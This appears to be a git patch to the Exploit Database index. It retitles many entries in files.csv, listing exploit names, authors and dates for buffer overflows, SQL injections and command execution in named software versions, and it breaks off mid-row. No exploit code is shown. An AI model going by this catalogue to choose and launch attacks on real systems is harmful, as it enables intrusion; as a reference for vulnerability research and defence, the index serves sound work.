From 7607be84a387b0d0afc3696cdf83d3d4cdac57a9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 10 Sep 2016 05:08:39 +0000 Subject: [PATCH] DB: 2016-09-10 3 new exploits freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated) freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow freeSSHd 1.2.1 - Authenticated Remote SEH Overflow Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection AvailScript Jobs Portal Script - Authenticated (jid) SQL Injection AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service Serv-U 7.3 - (Authenticated) Remote FTP File Replacement Serv-U 7.3 - Authenticated (stou con:1) Denial of Service Serv-U 7.3 - Authenticated Remote FTP File Replacement freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC Hannon Hill Cascade Server - (Authenticated) Command Execution Hannon Hill Cascade Server - Authenticated Command Execution Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service NetAccess IP3 - (Authenticated) (ping option) Command Injection NetAccess IP3 - Authenticated (ping option) Command Injection Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting Apache Axis2 Administration console - Authenticated Cross-Site Scripting Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit) Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit) UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Authenticated Remote Buffer Overflow ActFax Server FTP - (Authenticated) Remote Buffer Overflow ActFax Server FTP - Authenticated Remote Buffer Overflow Oracle Database - Protocol Authentication Bypass Oracle Database - Protocol Authentication Bypass IRIS Citations Management Tool - (Authenticated) Remote Command Execution IRIS Citations Management Tool - Authenticated Remote Command Execution Airmail 3.0.2 - Cross-Site Scripting LamaHub 0.0.6.2 - Buffer Overflow Vodafone Mobile Wifi - Reset Admin Password Zabbix 2.0 - 3.0.3 - SQL Injection Zabbix 2.0 < 3.0.3 - SQL Injection Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution Acuity CMS 2.6.2 - (ASP) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution Alfresco - /proxy endpoint Parameter Server Side Request Forgery (SSRF) Alfresco - /cmisbrowser url Parameter Server Side Request Forgery (SSRF) Alfresco - /proxy endpoint Parameter Server Side Request Forgery Alfresco - /cmisbrowser url Parameter Server Side Request Forgery vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF) vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery --- files.csv | 73 ++++++++--------- platforms/hardware/webapps/40357.py | 116 ++++++++++++++++++++++++++++ platforms/linux/remote/40339.py | 25 +++--- platforms/linux/remote/40358.py | 85 ++++++++++++++++++++ platforms/osx/webapps/40359.txt | 36 +++++++++ 5 files changed, 289 insertions(+), 46 deletions(-) create mode 100755 platforms/hardware/webapps/40357.py create mode 100755 platforms/linux/remote/40358.py create mode 100755 platforms/osx/webapps/40359.txt diff --git a/files.csv b/files.csv index 650da3f74..72a07be75 100755 --- a/files.csv +++ b/files.csv @@ -5335,7 +5335,7 @@ id,file,description,date,author,platform,type,port 5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'index.php mid' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0 5707,platforms/php/webapps/5707.txt,"Social Site Generator - (path) Remote File Inclusion",2008-05-31,vBmad,php,webapps,0 5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0 -5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated)",2008-05-31,securfrog,windows,dos,0 +5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0 5710,platforms/php/webapps/5710.pl,"Joomla Component com_biblestudy 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0 5712,platforms/multiple/dos/5712.pl,"Samba (client) - receive_smb_raw() Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 @@ -5375,7 +5375,7 @@ id,file,description,date,author,platform,type,port 5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0 5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0 -5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22 +5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22 5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0 5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 @@ -5709,7 +5709,7 @@ id,file,description,date,author,platform,type,port 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0 6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0 -6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0 +6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0 6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0 6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0 @@ -5997,7 +5997,7 @@ id,file,description,date,author,platform,type,port 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0 6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0 6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps,0 -6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 +6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - Authenticated (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 @@ -6089,7 +6089,7 @@ id,file,description,date,author,platform,type,port 6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0 6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0 -6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0 +6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0 6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0 6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0 6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 @@ -6232,8 +6232,8 @@ id,file,description,date,author,platform,type,port 6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0 -6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0 -6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Authenticated) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0 +6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0 +6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0 6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0 @@ -6368,18 +6368,18 @@ id,file,description,date,author,platform,type,port 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0 6798,platforms/windows/local/6798.pl,"VLC Media Player - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0 6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0 -6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0 +6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0 6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0 6802,platforms/php/webapps/6802.txt,"Joomla Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0 6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0 6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 -6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0 +6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0 6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0 6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0 -6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0 +6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0 6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0 @@ -7759,7 +7759,7 @@ id,file,description,date,author,platform,type,port 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0 8246,platforms/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist' Local Buffer Overflow",2009-03-19,zAx,windows,local,0 -8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - (Authenticated) Command Execution",2009-03-19,"Emory University",cgi,webapps,0 +8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",cgi,webapps,0 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0 @@ -7785,7 +7785,7 @@ id,file,description,date,author,platform,type,port 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0 -8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 +8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0 @@ -7795,7 +7795,7 @@ id,file,description,date,author,platform,type,port 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos,0 8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - (view.php id) SQL Injection",2009-03-24,x0r,php,webapps,0 -8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 +8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)",2009-03-25,"Guido Landi",multiple,dos,0 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,php,webapps,0 @@ -8525,7 +8525,7 @@ id,file,description,date,author,platform,type,port 9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - (index.php t) Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0 9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0 -9039,platforms/multiple/remote/9039.txt,"Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0 +9039,platforms/multiple/remote/9039.txt,"Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0 9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip - (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0 9041,platforms/php/webapps/9041.txt,"Audio Article Directory - (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 9042,platforms/php/webapps/9042.pl,"NEWSolved 1.1.6 - (login grabber) Multiple SQL Injection",2009-06-29,jmp-esp,php,webapps,0 @@ -8568,7 +8568,7 @@ id,file,description,date,author,platform,type,port 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,linux,local,0 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié ",windows,dos,0 -9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0 +9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0 9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password",2009-07-09,rEcruit,php,webapps,0 9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0 @@ -9124,7 +9124,7 @@ id,file,description,date,author,platform,type,port 9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,windows,local,0 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0 -9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0 +9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0 9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0 9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash",2009-09-14,cloud,hardware,dos,0 9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos,0 @@ -9146,7 +9146,7 @@ id,file,description,date,author,platform,type,port 9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - (CreateStore) ActiveX Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos,0 9686,platforms/windows/dos/9686.py,"VLC Media Player < 0.9.6 - (CUE) Local Buffer Overflow (PoC)",2009-09-15,Dr_IDE,windows,dos,0 9687,platforms/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,windows,local,0 -9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (Authenticated) (ping option) Command Injection",2009-09-15,r00t,hardware,local,0 +9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - Authenticated (ping option) Command Injection",2009-09-15,r00t,hardware,local,0 9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - '.m3u' Local Crash (PoC)",2009-09-15,zAx,windows,dos,0 9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660 9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash",2009-09-15,prodigy,windows,dos,0 @@ -10148,7 +10148,7 @@ id,file,description,date,author,platform,type,port 11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",php,webapps,0 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0 11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0 -11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0 +11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0 11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps,0 11024,platforms/php/webapps/11024.txt,"Joomla Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps,0 11025,platforms/php/webapps/11025.txt,"AWCM - Database Disclosure",2010-01-06,alnjm33,php,webapps,0 @@ -11581,7 +11581,7 @@ id,file,description,date,author,platform,type,port 12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0 -12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0 +12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 @@ -12649,10 +12649,10 @@ id,file,description,date,author,platform,type,port 14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0 14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0 14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0 -14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 -14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 +14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 +14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0 -14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0 +14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0 14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 14406,platforms/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack 